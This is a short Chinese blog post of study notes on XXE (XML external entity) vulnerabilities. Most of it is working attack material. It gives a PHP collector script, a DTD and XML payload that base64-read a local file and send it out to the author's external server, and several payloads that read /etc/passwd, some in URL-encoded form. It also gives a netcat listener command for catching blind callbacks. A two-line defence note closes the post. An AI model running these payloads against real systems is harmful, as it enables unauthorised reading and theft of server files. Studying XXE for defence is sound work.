前言
遇到个XXE漏洞,查点资料做个笔记。
在叙述之前说下XML,XML被设计用来传输和存储数据,HTML被设计用来显示数据,XML格式必须严格化。
漏洞原理
1:XML可控且后端处理时无过滤(满足这个其实就可以了)
2:XML解析是引用外部实体(默认就可以)
攻击代码
服务器端
Get_Xxe.php
1
2
3
4
5
6
7
8
9
10
11
| <?php
//简单的把GET过来的请求追加的保存在本地1.txt文件下
$txt = $_GET['file'];
if($txt)
{
$file = fopen("1.txt","a+");
fwrite($file,"$txt"."\r\n");
print($txt);
fclose($file);
}
?>
|
1.dtd
1
2
3
4
| <!ENTITY % all
"<!ENTITY % send SYSTEM 'http://www.bywalks.com/Get_Xxe.php?file=%file;'>"
>
%all;
|
XML语句
1
2
3
4
5
6
7
| <?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=E:/phpStudy/WWW/1.txt">
<!ENTITY % dtd SYSTEM "http://www.bywalks.com/1.dtd">
%dtd;
%send;
]>
|
备用语句
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| /有回显
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<x>&xxe;</x>
//Blind XXE
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://www.bywalks.com/Get_Xxe.php?file=XXE">
]>
<x>&xxe;</x>
本地NC:nc.exe -lvvp 83
远端访问:<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://IP:83">]><foo>&xxe;</foo>
URLEncode:%3c!DOCTYPE+foo+%5b%3c!ENTITY+xxe+SYSTEM+%22http%3a%2f%2fIP%3a83%22%3e%5d%3e%3cfoo%3e%26xxe%3b%3c%2ffoo%3e
PAYLOAD:<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://www.bywalks.com/Get_Xxe.php?file=cunzai">]><foo>&xxe;</foo>
URLEncode:%3c!DOCTYPE+foo+%5b%3c!ENTITY+xxe+SYSTEM+%22http%3a%2f%2fwww.bywalks.com%2fGet_Xxe.php%3ffile%3ddoudoudou%22%3e%5d%3e%3cfoo%3e%26xxe%3b%3c%2ffoo%3e
PAYLOAD:<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
URLEncode:%3c!DOCTYPE+foo+%5b%3c!ENTITY+xxe+SYSTEM+%22file%3a%2f%2f%2fetc%2fpasswd%22%3e%5d%3e%3cfoo%3e%26xxe%3b%3c%2ffoo%3e
file:///etc/passwd
php://filter/read=convert.base64-encode/resource=E:/phpStudy/WWW/1.txt
|
如何防御
1:禁止引用外部实体,但SSRF还可用
2:过滤<> RNTITY 等(前面已经说过XML是必须严格化,所以过滤这些就无法解析)
Author:
Bywalks
Permalink:
http://bywalks.com/2017/12/20/%E6%B5%85%E8%B0%88xxe/
License:
Copyright (c) 2022 CC-BY-NC-4.0 LICENSE
Slogan:
Do you believe in DESTINY?